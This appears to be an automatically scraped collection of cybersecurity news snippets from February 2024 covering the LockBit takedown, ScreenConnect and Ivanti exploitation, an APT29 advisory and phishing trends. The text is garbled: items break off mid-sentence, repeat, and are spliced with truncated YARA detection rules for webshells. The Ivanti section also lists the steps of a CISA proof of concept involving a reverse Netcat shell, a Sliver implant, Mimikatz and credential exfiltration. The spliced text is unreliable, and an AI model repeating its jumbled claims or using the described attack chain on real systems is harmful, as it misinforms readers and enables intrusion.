MITRE ATT&CK techniques identified in this advisory. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Inside the strategy of Salesforce’s new Chief Trust Officer In this Help Net Security interview, Arkin discusses a collaborative approach to building trust among customers, employees, and stakeholders, focusing on transparency, shared responsibility, and empowering others to integrate trusted and responsible technologies. How decentralized identity is shaping the future of data protection In this Help Net Security interview, Patrick Harding, … More
The post Week in review: 10 cybersecurity startups to watch, admins urged to remove VMware vSphere plugin appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Inside the strategy of Salesforce’s new Chief Trust Officer In this Help Net Security interview, Arkin discusses a collaborative approach to building trust among customers, employees, and stakeholders, focusing on transparency, shared responsibility, and empowering others to integrate trusted and responsible technologies. VMware pushes admins to uninstall vulnerable, deprecated vSphere plugin (CVE-2024-22245, CVE-2024-22250) VMware Enhanced Authentication Plug-in (EAP), a plugin for VMware vSphere, has two vulnerabilities (CVE-2024-22245, CVE-2024-22250) that could be exploited by attackers to mount authentication relay and session hijack attacks. "Autosummary:
" PRODAFT, in its own analysis of the LockBit operation, said it identified over 28 affiliates, some of whom share ties with other Russian e-crime groups like Evil Corp, FIN7, and Wizard Spider (aka TrickBot)." "[Initial access brokers], which were the main source of LockBit"s venture, will not trust their access to a group after a takedown, as they want their access to be turned into cash." "Autosummary:
"Autosummary:
Relaunched LockBit data leak site shows five victims source: BleepingComputer On February 19, authorities took down LockBit’s infrastructure, which included 34 servers hosting the data leak website and its mirrors, data stolen from the victims, cryptocurrency addresses, decryption keys, and the affiliate panel. "Autosummary:
"Autosummary:
"Autosummary:
Second, despite the law enforcement operation against LockBit, it seems as though some affiliates are still up and running” According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. "In 2023, malicious email threats bypassing secure email gateways (SEGs) increased by more than 100%, according to Cofense. In just two years, Cofense identified over 1.5 million malicious emails bypassing their customers’ SEGs, signaling a 37% increase in threats compared to 2022, and a staggering 310% increase over 2021. To put this in context, the report highlights that Cofense detected at least one malicious email bypassing their customers’ SEGs every 57 seconds. With the increasing … More
The post Secure email gateways struggle to keep pace with sophisticated phishing campaigns appeared first on Help Net Security.
"Autosummary:
In just two years, Cofense identified over 1.5 million malicious emails bypassing their customers’ SEGs, signaling a 37% increase in threats compared to 2022, and a staggering 310% increase over 2021. “As we unveil the statistics from the 2024 Annual State of Email Security Report, it’s evident that the email-based attack vector is evolving at an unprecedented pace going into 2024,” said David Van Allen, CEO of Cofense. "Hackers have significantly increased demands for ransomware, rising over 20% year-over-year to $600,000, according to Arctic Wolf. Organizations are failing to patch their networks And there are worrying signs that 2024 will be especially volatile, as ransomware groups expand their list of targets, and explore new pressure tactics in response to increasingly effective international law enforcement efforts and the growing momentum of refuse-to-pay initiatives. “By helping to end cyber risk for thousands of customers around … More
The post 2024 will be a volatile year for cybersecurity as ransomware groups evolve appeared first on Help Net Security.
"Autosummary:
With an uptick in cloud services, more endpoints, unmanaged/BYO devices, and business operations transitioning from analog to digital platforms, stopping ransomware attacks with effective prevention, detection, and response becomes more challenging by the day. "Autosummary:
"The Federal Trade Commission will require software provider Avast to pay $16.5 million and prohibit the company from selling or licensing any web browsing data for advertising purposes to settle charges that the company and its subsidiaries sold such information to third parties after promising that its products would protect consumers from online tracking. In its complaint, the FTC says that Avast, based in the United Kingdom, through its Czech subsidiary, unfairly collected consumers’ browsing … More
The post Avast ordered to pay $16.5 million for misuse of user data appeared first on Help Net Security.
"Autosummary:
For example, as alleged in the complaint, Jumpshot entered into a contract with Omnicom, an advertising conglomerate, which stated that Jumpshot would provide Omnicom with an “All Clicks Feed” for 50% of its customers in the United States, United Kingdom, Mexico, Australia, Canada, and Germany. "Autosummary:
~3800 vulnerable ConnectWise ScreenConnect instances (authentication bypass using an alternate path or channel (CVSS 10) & path traversal (CVSS 8.4)) https://t.co/tPi9ALNVab IP data in:https://t.co/qxv0Gv5ELc ~93% instances of ScreenConnect seen on 2024-02-20 still vulnerable: https://t.co/CRpEHutjFS pic.twitter.com/hiwPqnouby — Shadowserver (@Shadowserver) February 21, 2024 The Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog. "Autosummary:
"Autosummary:
Insomniac Games leak on Rhysida"s leak site (BleepingComputer) Now, Insomniac Games is notifying employees whose data was stolen between November 25 and November 26 and later leaked on the Rhysida ransomware group"s leak site. "Autosummary:
“Given that confirmed attacks by LockBit over their 4 years in operation total well over 2,000, this suggests that their impact globally is in the region of multi-billions of dollars” - UK’s National Crime Agency LockBit had $110+ million in 2,200 unspent bitcoins source: NCA In mid-June 2023, America’s Cyber Defense Agency (CISA) said that LockBit was responsible for 1,700 ransomware attacks in the U.S. since 2020 and the gang extorted victims of $91 million. "Autosummary:
"Autosummary:
"Autosummary:
230K individuals impacted by a data breach suffered by Telco provider Tangerine Pierluigi Paganini February 23, 2024 February 23, 2024 Australian telecommunications provider Tangerine disclosed a data breach that impacted roughly 230,000 individuals. "This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear.
The UK National Cyber Security Centre (NCSC) and international partners assess that APT29 is a cyber espionage group, almost certainly part of the SVR, an element of the Russian intelligence services. The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the Canadian Centre for Cyber Security (CCCS), and New Zealand Government Communications Security Bureau (GCSB) agree with this attribution and the details provided in this advisory.
This advisory provides an overview of TTPs deployed by the actor to gain initial access into the cloud environment and includes advice to detect and mitigate this activity.
To download the PDF version of this report, click here.
The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain. It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.
SVR actors are also known for:
Autosummary:
How SVR-Attributed Actors are Adapting to the Move of Government and Corporations to Cloud Infrastructure OVERVIEW This advisory details recent tactics, techniques, and procedures (TTPs) of the group commonly known as APT29, also known as Midnight Blizzard, the Dukes, or Cozy Bear. PREVIOUS ACTOR ACTIVITY The NCSC has previously detailed how Russian Foreign Intelligence Service (SVR) cyber actors have targeted governmental, think tank, healthcare, and energy targets for intelligence gain.It has now observed SVR actors expanding their targeting to include aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. MITIGATION AND DETECTION A number of mitigations will be useful in defending against the activity described in this advisory: Use multi-factor authentication (/2-factor authentication/two-step verification) to reduce the impact of password compromises.The US National Security Agency (NSA), the US Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber National Mission Force (CNMF), the Federal Bureau of Investigation (FBI), Australian Signals Directorate’s "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: BlackBerry – BlackBerry helps keeps you one step ahead. "The speed of cyberattacks continues to accelerate at an alarming rate, according to CrowdStrike. Adversaries increasingly exploit stolen credentials The speed of cyberattacks continues to accelerate at an alarming rate. The report indicates that the average breakout time is down to only 62 minutes from 84 in the previous year (with the fastest recorded attack coming in at 2 minutes and 7 seconds). Once initial access was obtained, it took only 31 seconds for an … More
The post Attack velocity surges with average breakout time down to only 62 minutes appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video, Tyler Adams, CEO at CertifID, illustrates how the real estate sector needs to invest significant effort in educating consumers and implementing protective measures to safeguard real estate transactions. Recent CertifID research found that median consumer losses in real estate fraud schemes exceeded $70,000 per incident as a result of stolen buyer down payments and seller net proceeds. Also, 51% of consumers are not adequately aware of the risks of … More
The post Wire fraud scams escalate in real estate deals appeared first on Help Net Security.
"Autosummary:
"42% of organizations surveyed in the US are considering or already have moved at least half of their cloud-based workloads back to on-premises infrastructures, a phenomenon known as cloud repatriation, according to Citrix. The survey showed that 94% of respondents had been involved with a cloud repatriation project in the last three years. The most common reasons for cloud repatriation projects Unexpected security issues (41%) and high project expectations (29%) were reported as the top … More
The post Cybersecurity fears drive a return to on-premise infrastructure from cloud computing appeared first on Help Net Security.
"Autosummary:
After reflecting on their experience, IT leaders found that the most common reasons for cloud repatriation projects were security concerns, unexpected costs, performance issues, compatibility problems, and service downtime. "Autosummary:
"LockBit"s operation grew in scale by consistently delivering new product features, providing good customer support, and at times, marketing stunts that included paying people to tattoo themselves with the group"s logo," Intel 471 said. "The two ScreenConnect vulnerabilities ConnectWise has recently urged customers to patch have finally been assigned CVE numbers: CVE-2024-1709 for the authentication bypass, CVE-2024-1708 for the path traversal flaw. ConnectWise has also released a newer version of ScreenConnect (v23.9.10.8817), which contains the fixes for the two flaws and other non-security fixes but – more crucially – customers no longer under maintenance can upgrade to it to protect themselves against exploitation. Confirmed exploitation, PoC available ConnectWise shared … More
The post Attackers exploiting ConnectWise ScreenConnect flaws, fixes available for all users (CVE-2024-1709, CVE-2024-1708) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" When reached for comment, Joshua Rogers, the developer of SSH-Snake, told The Hacker News that the tool offers legitimate system owners a way to identify weaknesses in their infrastructure before attackers do, urging companies to use SSH-Snake to "discover the attack paths that exist – and fix them. "Autosummary:
The remote access trojan, which comes with capabilities for file transfers and command execution, is believed to have been put to use as early as 2014, and has also been utilized by other North Korean threat actors known as Kimsuky and ScarCruft (aka APT37). "Autosummary:
"Autosummary:
"Autosummary:
"In the last 24 hours, we"ve observed several LockBit attacks, apparently after exploitation of the recent ConnectWise ScreenConnect vulnerabilities (CVE-2024-1708 / CVE-2024-1709)," the Sophos" threat response task force said. "Autosummary:
Ransomware gangs exploit Remote Monitoring and Management (RMM) tools through one of three main strategies: Gaining initial access via preexisting RMM tools: As RMM tools typically require credentials for system access, attackers can exploit weak or default RMM credentials and vulnerabilities to gain unauthorized access to a network. In this post, we will delve into how ransomware gangs use RMM tools, identify the most exploited RMM tools, and discuss how to detect and prevent suspicious RMM tool activity using Application Block and Endpoint Detection and Response (EDR). Whether using RMM tools for initial access, post-infection ransomware deployment, or a combination of the two, ransomware attackers are upping the sophistication of their attacks. "Autosummary:
"Autosummary:
Lavish compensation and conditions In this dramatic scenario here is the real request: “ The bank manager, due to my refugee status, advised me to find a partner or representative anywhere in the world who will take care of me and receive the money on my behalf[ …]”, obviously for a generous fee , “ Please, I really need your kind-hearted help and I am willing to offer you a part of the money if you help me .”.Therefore pay attention to the typical scheme: The scam begins with an email received from an alleged widow in difficulty asking for help in receiving the inheritance of her husband who died in the war, in exchange for a large fee; once responded, other emails will arrive, with other information and the intermediation of a bank and refugee official; Finally, personal details and financial support will be requested as well as all instructions to prepare the necessary documentation for the transfer of the fund, to be paid to an account of a refugee agency. "Autosummary:
"Autosummary:
"On February 22, 2024, Sophos X-Ops reported through our social media handle that despite the recent law enforcement activity against the LockBit threat actor group we had observed several attacks over the preceding 24 hours that appeared to be carried out with LockBit ransomware, built using a leaked malware builder tool," Sophos explained. "At Help Net Security, we’ve been following the cybersecurity business landscape closely for the past 25 years. Through our Industry News section, we’ve been tracking the pulse of the cybersecurity world, bringing you product news from companies worldwide. Certain vendors have consistently managed to capture our attention. We decided to spotlight companies breaking new ground, attracting top talent, and leading innovation in key areas. We are focusing on those who are not just responding to … More
The post 10 cybersecurity startups to watch in 2024 appeared first on Help Net Security.
"Autosummary:
Funding In October 2023, Lakera raised $10 million in a funding round led by Redalpine Additional founders, like Inovia Capital and Fly Ventures, and industry expert angels, including the co-founders of Snyk and executives from Datadog, Hybris, and Palo Alto Networks, also participated. Israel, CEO: Shahar Ben-Hador Radiant Security, founded by experts from Imperva and Exabeam, provides an AI-driven co-pilot for Security Operations Centers, enhancing analyst efficiency, detecting more attacks, and significantly reducing response times.Cybersecurity leaders Michael Sutton, Thomas ‘Halvar Flake’ Dullien, Jamie Butler, Ryan Permeh, Bryson Bort, Pedram Amini, Chris Ueland, and David Mandel from Emerging Ventures also joined as investors. "Last year was challenging for the global market, and the market downturn greatly affected even the historically resilient cybersecurity ecosystem. In this Help Net Security video, Merav Ben Avi, Content Manager at YL Ventures, talks about how the Israeli cybersecurity industry, much like the global one, skyrocketed in 2021 with record-breaking capital and an exceptional number of new startups and unicorns. However, the market slowdown in 2022, economic instability in 2023, and geopolitical unrest in … More
The post A closer look at Israeli cybersecurity funding and M&A activity in 2023 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Operation Texonto, as the entire campaign has been codenamed, has not been attributed to a specific threat actor, although some elements of it, particularly the spear-phishing attacks, overlap with COLDRIVER, which has a history of harvesting credentials via bogus sign-in pages. "Autosummary:
"Autosummary:
By coupling advanced technology with human-led analysis, a managed EDR performs critical cybersecurity tasks on your behalf, namely: Monitoring and collecting endpoint data Detecting and investigating threats Triaging alerts Providing actionable remediation steps, including one-click solutions Easy to deploy, Huntress Managed EDR is fully managed and monitored by a 24/7 Security Operations Center.Small- to mid-sized healthcare organizations have, unfortunately, become vulnerable targets from which cybercriminals can easily steal sensitive data, extort heavy ransoms, and, worst of all, diminish critical patient care. This entails creating layers to your defenses with solutions such as intrusion prevention, data encryption, threat detection, patch management, and more. Building a thorough defense infrastructure, however, requires sizable capital, resources, and expertise.However, this level of care demands more avenues to access data, specifically via tablets, laptops, and mobile devices.However, according to the report, The State of Cybersecurity for Mid-Sized Businesses in 2023, Huntress discovered over 60% of respondents didn"t have any dedicated cybersecurity experts on staff. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The flaw was located by noticing code changes on the "ScreenConnect.Core.dll" file, pointing to ZipSlip, a vulnerability that occurs when applications don"t properly sanitize the file extraction path, which could result in overwriting sensitive files. "Autosummary:
U.S. State Department Secure Drop page (BleepingComputer) "The Department of State is announcing reward offers totaling up to $15 million for information leading to the arrest and/or conviction of any individual participating in a LockBit ransomware variant attack and for information leading to the identification and/or location of any key leaders of the LockBit ransomware group," U.S. State Department Spokesperson Matthew Miller said today. "Apple is preparing for future threats to iMessage by introducing upgraded encryption for its messaging service by using quantum computers.
Think of it as state-of-the-art quantum security for messaging at scale, the company says, resulting in Apple"s messaging system being more secure against both current and future foes.
Announced on Apple’s Security Research blog, the new iMessage protection is called PQ3 and promises the “strongest security properties of any at-scale messaging protocol in the world.”
Autosummary:
In this case, Apple’s security teams asked themselves what might happen if hackers, criminals, or state-backed rogue surveillance firms gathered vast quantities of encrypted iMessage data today in order to break that encryption using quantum computers tomorrow. Think of it as state-of-the-art quantum security for messaging at scale, the company says, resulting in Apple"s messaging system being more secure against both current and future foes. Apple has submitted PQ3 to two leading security researchers who have verified the technology — Professor David Basin of the Information Security Group at ETH in Zurich, Switzerland, and Douglas Stebila, a University of Waterloo Professor. "Autosummary:
Major Linux distributions such as Debian (1, 2), Red Hat (1), SUSE (1, 2), and Ubuntu (1, 2) have released advisories for the two flaws. "Autosummary:
Volume of phishing emails linking to Google Cloud Run (Cisco) Attack chain The attacks start with phishing emails to potential victims, crafted to appear as legitimate communications for invoices, financial statements, or messages from local government and tax agencies. "Autosummary:
"Autosummary:
"By avoiding the easily detectable patterns associated with scripted attacks, this new tool provides greater stealth, flexibility, configurability and more comprehensive credential discovery than typical SSH worms, therefore being more efficient and successful" - Sysdig Released on January 4, 2024, SSH-Snake is a bash shell script tasked with autonomously searching a breached system for SSH credentials and utilizing them for propagation. "Autosummary:
Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation.US GOV OFFERS A REWARD OF UP TO $15M FOR INFO ON LOCKBIT GANG MEMBERS AND AFFILIATES Pierluigi Paganini February 21, 2024 February 21, 2024 U.S. government offers rewards of up to $15 million for information that could lead to the identification or location of LockBit ransomware gang members and affiliates. "The Cybersecurity and Infrastructure Security Agency (CISA) and the following partners (hereafter referred to as the authoring organizations) are releasing this joint Cybersecurity Advisory to warn that cyber threat actors are exploiting previously identified vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure gateways. CISA and authoring organizations appreciate the cooperation of Volexity, Ivanti, Mandiant and other industry partners in the development of this advisory and ongoing incident response activities. Authoring organizations:
Of particular concern, the authoring organizations and industry partners have determined that cyber threat actors are able to deceive Ivanti’s internal and external Integrity Checker Tool (ICT), resulting in a failure to detect compromise.
Cyber threat actors are actively exploiting multiple previously identified vulnerabilities—CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893—affecting Ivanti Connect Secure and Ivanti Policy Secure gateways. The vulnerabilities impact all supported versions (9.x and 22.x) and can be used in a chain of exploits to enable malicious cyber threat actors to bypass authentication, craft malicious requests, and execute arbitrary commands with elevated privileges.
During multiple incident response "
Autosummary:
" hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2" os = "linux" os_arch = "all" report = "TIB-20231215" scan_context = "file,memory" last_modified = "2024-01-09T10:05Z" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" rule_id = 9995 version = 4 strings: $s = "eval{my $c=Crypt::RC4->new(" condition: $s } rule apt_webshell_aspx_glasstoken: UTA0178 { meta: author = "threatintel@volexity.com" date = "2023-12-12" description = "Detection for a custom webshell seen on external facing server." hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb" os = "all" os_arch = "all" reference = "https://github.com/MisterDaneel/pysoxy/blob/master/pysoxy.py" report = "TIB-20240109" scan_context = "file,memory" last_modified = "2024-01-09T13:45Z" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" rule_id = 10065 version = 3 strings: $s1 = "proxy_loop" ascii $s2 = "connect_to_dst" ascii $s3 = "request_client" ascii $s4 = "subnegotiation_client" ascii $s5 = "bind_port" ascii condition: all of them } Below is proof of concept being released by CISA, which demonstrates the capacity of and opportunity for a threat actor to exfiltrate Domain Administrator credentials that were used during appliance configuration: Figure 1: Ivanti Domain Join Configuration with “Save Credentials” Figure 2: CVE-2023-46805 Exploitation for Reverse Netcat Connection Figure 3: Upgrade Netcat Connection to Sliver Implant Figure 4: Leverage Sliver Implant to Run Perl Script for Retrieval of Cached Domain Administrator Credentials Below is a demonstration of the capacity for post exploitation exfiltration of base64 encoded cleartext credentials for active directory users and their associated NTLM password hashes: Figure 5: Configuration of User Realm Figure 6: User Realm Configuration to Domain Figure 7: Configuration of User Realm Mapping Figure 8: Login as “vpnuser1” to Establish an Active Session Figure 9: Using Sliver Implant as Shown in Figure 3, Execute Perl Script to Retrieve base64 Encoded Cleartext Password and NTLM Password Hash for Authenticated User Figure 10: Decode base64 Encoded Blob to Display User’s Plaintext Credentials Figure 11: Using Mimikatz Validate NTLM Password Hash Obtained in Figure 10 Matches Active Directory User Credential Hash Figure 12: Inactive Sessions for “vpnuser2” and “vpnuser3” Appear in Server Logs Figure 13: Exfiltrate “lmdb/data” and “lmdb-backup/data” data.mb Database Files Containing Credentials for Active and Inactive Sessions Figure 14: Parse Database Files to Disclose base64 Encoded Plaintext Credentials from LMDB Database Files Figure 15: Parse Database Files to Disclose NTLM Hashes from LMDB Database Files Figure 16: Parse Backup Database Files to Disclose Additional base64 Encoded Plaintext Credentials from LMDB-Backup Database Files Figure 17: Decode Credentials from LMDB-Backup Database Files Figure 18: Parse Database Files to Disclose NTLM Hashes for Additional Users from LMDB-Backup Database Files APPENDIX B: INDICATORS OF COMPROMISE Table 1: Ivanti Connect Secure VPN Indicators of Compromise Filename Description Purpose /home/perl/DSLogConfig.pm" hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988" os = "win" os_arch = "all" reference = "https://github.com/L-codes/Neo-reGeorg/blob/master/templates/tunnel.aspx" report = "TIB-20231215" scan_context = "file,memory" last_modified = "2024-01-09T10:04Z" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" rule_id = 410 version = 7 strings: $a1 = "every office needs a tool like Georg" ascii $a2 = "cmd = Request." hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d" os = "win" os_arch = "all" report = "TIB-20231215" scan_context = "file,memory" last_modified = "2024-01-09T10:08Z" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" rule_id = 9994 version = 5 strings: $s1 = "=Convert.FromBase64String(System.GetString(" ascii $re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/ condition: for any i in (0..#s1): ( $re in (@s1[i]..@s1[i]+512) ) } rule webshell_aspx_regeorg { meta: author = "threatintel@volexity.com" date = "2018-08-29" description = "Detects the reGeorg webshell based on common strings in the webshell.ToString());" ascii condition: any of ($a*) or $proxy1 or all of ($proxy_b*) } rule hacktool_py_pysoxy { meta: author = "threatintel@volexity.com" date = "2024-01-09" description = "SOCKS5 proxy tool used to relay connections. United Kingdom National Cyber Security Centre (NCSC-UK) Canadian Centre for Cyber Security (Cyber Centre), a part of the Communications Security Establishment New Zealand National Cyber Security Centre (NCSC-NZ) CERT-New Zealand (CERT NZ) Of particular concern, the authoring organizations and industry partners have determined that cyber threat actors are able to deceive Ivanti’s internal and external Integrity Checker Tool (ICT), resulting in a failure to detect compromise.UTA0178 { meta: author = "threatintel@volexity.com" date = "2023-12-13" description = "Detection for the COMPLYSHELL webshell. Download the PDF version of this report: Threat Actors Exploit Multiple Vulnerabilities in Ivanti Connect Secure and Policy Secure Gateways (PDF, 2.20 MB ) For a downloadable copy of IOCs, see: TECHNICAL DETAILS This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. The ability to exfiltrate domain administrator cleartext credentials, if saved when adding an “Active Directory Authentication server” during setup, was accomplished by using the root-level access obtained from the vulnerabilities to interface directly with the internal server and retrieve the cached credentials as shown in Figure 4, APPENDIX A. Users who currently have active sessions to the appliance could have their base64 encoded active directory cleartext passwords, in addition to the New Technology LAN Manager (NTLM) password hashes, retrieved with the same access, as shown in Figure 10, APPENDIX A.Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and authoring organizations. The authoring organizations encourage network defenders to (1) assume that user and service account credentials stored within the affected Ivanti VPN appliances are likely compromised, (2) hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory, (3) run Ivanti’s most recent external ICT, and (4) apply available patching guidance provided by Ivanti as version updates become available.Following the actors’ developments, Ivanti disclosed three additional vulnerabilities: CVE-2024-21893 is a server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) Ivanti Policy Secure (9.x, 22.x), and Ivanti Neurons for ZTA that allows an attacker to access restricted resources without authentication.When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. "Autosummary:
Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Top 5 ransomware gangs by known attacks, February 2023 – January 2024 At this stage we have no idea how serious the damage to LockBit is, and law enforcement is only claiming that the group has been “disrupted”. "Analysis of 7 billion emails shows clean links are duping users, malicious EML attachments increased 10-fold in Q4, and social engineering attacks are at all-time highs, according to VIPRE Security. The rise of the EML file attachments In 2024, QR code hacks or quishing will increase, use of AI to create content for spam emails including deepfakes will rise; highly personalized social media mining will grow further; and a wide array of file types and … More
The post Clean links and sophisticated scams mark new era in email attacks appeared first on Help Net Security.
"Autosummary:
Financial services (22%) was the most targeted sector by phishing and malspam emails, followed by information technology (14%), healthcare (14%), education (10%), and government (8%).This shows that attackers are launching malware merely for reconnaissance now, as valuable artifacts like username, computer name, operating system, CPU name, RAM, and IP address may fetch more on the Dark Web than they could garner in a one-off attack. "Autosummary:
"Autosummary:
"Autosummary:
A Ukrainian national, Mark Sokolovsky, has been indicted for crimes related to fraud, money laundering and aggravated identity theft and extradited to the United States from the Netherlands, the US Attorney’s Office of the Western District of Texas has announced. "On Monday afternoon, LockBit’s leak site has been taken over by a coalition of law enforcement agencies and is showing a seizure notice that promises more details today, at 11:30 GMT. “This site is now under the control of The National Crime Agency of the UK, working in close cooperation with the FBI and the international law enforcement task force, ‘Operation Cronos’,” the notice says. “We can confirm that Lockbit’s services have been disrupted as … More
The post LockBit disrupted by international law enforcement task force appeared first on Help Net Security.
"Autosummary:
“According to LockBit admins, the law enforcement agencies exploited PHP CVE-2023-3824 vulnerability to compromise LockBit’s public-facing servers and gain access to LockBit source code, internal chat, victims’ details, and stolen data,” he told Help Net Security. "Autosummary:
Cactus ransomware gang claims the theft of 1.5TB of data from Energy management and industrial automation firm Schneider Electric Pierluigi Paganini February 20, 2024 February 20, 2024 The Cactus ransomware gang claims the theft of 1.5TB of data from the Energy management and industrial automation firm Schneider Electric. "Autosummary:
It also provides "control system solutions for operational management, network utilization, pipeline management, leak detection and location, portfolio management, energy trading and sales. "Autosummary:
"We have source code, details of the victims you have attacked, the amount of money extorted, the data stolen, chats, and much, much more," the message reads. Previous charges against Lockbit ransomware actors include Mikhail Vasiliev (November 2022), Ruslan Magomedovich Astamirov (June 2023), Mikhail Pavlovich Matveev aka Wazawaka (May 2023) Operation Cronos The global LockBit crackdown was coordinated by Operation Cronos, a task force headed by the U.K. National Crime Agency (NCA) and coordinated in Europe by Europol and Eurojust. "In the wake of yesterday’s surprise law enforcement takeover of LockBit’s leak site, the UK National Crime Agency (NCA) and Europol have shared more information about the extent of the takedown. “Today, after infiltrating the group’s network, the NCA has taken control of the infrastructure that allows the Lockbit service to operate, compromising their entire criminal enterprise and damaging their credibility,” the Agency said. They’ve taken control of LockBit’s administration environment, which enabled affiliates to … More
The post LockBit takedown: Infrastructure disrupted, criminals arrested, decryption keys recovered appeared first on Help Net Security.
"Autosummary:
The freezing of over 200 cryptocurrency accounts linked to the group The takedown of 34 servers in the Netherlands, Germany, Finland, France, Switzerland, Australia, the United States and the United Kingdom (either belonging to the LockBit threat actors or to their affiliates) “At present, a vast amount of data gathered throughout the investigation is now in the possession of law enforcement. "Autosummary:
"Some of the data on LockBit"s systems belonged to victims who had paid a ransom to the threat actors, evidencing that even when a ransom is paid, it does not guarantee that data will be deleted, despite what the criminals have promised," the agency said. "Autosummary:
"Autosummary:
In addition to those mentioned here relating to access, password, and data leaks, which are fairly universal, configurations are used for key management, mobile security, operational resilience, phishing protection, SPAM protection, and more. Require Admin MFA To comply with NIST standards, all admin user accounts should be required to access the application using multi-factor authentication (MFA), such as a one-time password (OTP).Additionally, it would include terms like the user"s name, company products, partners, and other business terms. If your organization doesn"t have a password policy, consider following NIST guidelines: Don"t make mandatory password changes, as users tend to choose easy-to-remember passwords.NIST advocates for a strong and well-managed password policy, which is essential to protect sensitive user data, confidential business information, and proprietary assets stored within the cloud-based infrastructure. "Autosummary:
Sale post on the RAMP forums (KELA) “Selling the source code for Knight 3.0 ransomware, this will include the source code of the panel and the locker, all source code is owned and written in Glong C++,” says Cyclops in the post. "Autosummary:
The past three years have seen the explosive growth of infostealers, a type of malware that steals all browser credentials, cookies, cryptocurrency wallet information, and other sensitive data from a single host, exports it to C2 infrastructure, then self terminates on the machine. This access is then sold to other actors on three major dark web forums: Exploit, XSS, and RAMP, in an auction style format, or sold privately via direct messages in existing relationships. The Initial Access Broker Ecosystem Initial access brokers are highly specialized threat actors who focus on carrying out the initial stages of an attack, gaining initial access to a corporate IT environment, and establishing persistence. "Autosummary:
As well as taking over the leak site, law enforcement agencies have taken over LockBit’s administration environment, seized the infrastructure used by LockBit’s data exfiltration tool, Stealbit, captured over 1,000 decryption keys, and frozen 200 cryptocurrency accounts.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. The identity of Lockbitsupp won’t be a mystery for much longer The NCA could have put the information about the takedown anywhere, but it didn’t; it did something memorable, humorous, and deliberately humiliating with it. "ManageEngine released an ML-powered exploit triad analytics feature in its SIEM solution, Log360. Now, enterprises can knowledgeably trace the path of adversaries and mitigate breaches by providing complete contextual visibility into the exploit triad: users, entities and processes. Addressing the critical need for faster breach response “Today’s cyberthreats masterfully blend into the fabric of legitimate activity, weaponizing stolen credentials, mimicking trusted processes and exploiting human vulnerabilities. These insidious tactics create a critical challenge: an extended … More
The post ManageEngine unveils ML-powered exploit triad analytics feature appeared first on Help Net Security.
"Autosummary:
Highlights of ML-powered exploit triad analytics Log360’s threat detection and incident response (TDIR) module, Vigil IQ, features a dual-layered threat detection system released last year. "Autosummary:
The cloud security company said it detected the campaign after it identified an "unusual series of commands" targeting its Redis honeypots that are engineered to lower security defenses by disabling the following configuration options - It"s suspected that these options are turned off in order to send additional commands to the Redis server from external networks and facilitate future exploitation without attracting much attention. "Autosummary:
Since January 2020, affiliates utilizing LockBit have targeted organizations of diverse sizes spanning critical infrastructure sectors such as financial services, food and agriculture, education, energy, government and emergency services, healthcare, manufacturing, and transportation. “The Justice Department also unsealed an indictment obtained in the District of New Jersey charging Russian nationals Artur Sungatov and Ivan Kondratyev, also known as Bassterlord, with deploying LockBit against numerous victims throughout the United States, including businesses nationwide in the manufacturing and other industries, as well as victims around the world in the semiconductor and other industries.It shows that no criminal operation, wherever they are, and no matter how advanced, is beyond the reach of the Agency and our partners.” said National Crime Agency Director General, Graeme Biggar. "Autosummary:
